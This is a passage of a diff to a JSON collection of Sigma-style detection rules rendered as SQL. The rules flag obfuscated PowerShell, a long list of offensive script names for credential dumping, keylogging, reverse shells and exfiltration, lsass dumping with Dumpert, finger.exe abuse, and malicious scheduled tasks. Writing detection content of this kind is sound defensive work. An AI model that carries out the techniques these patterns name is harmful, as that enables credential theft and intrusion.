LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": 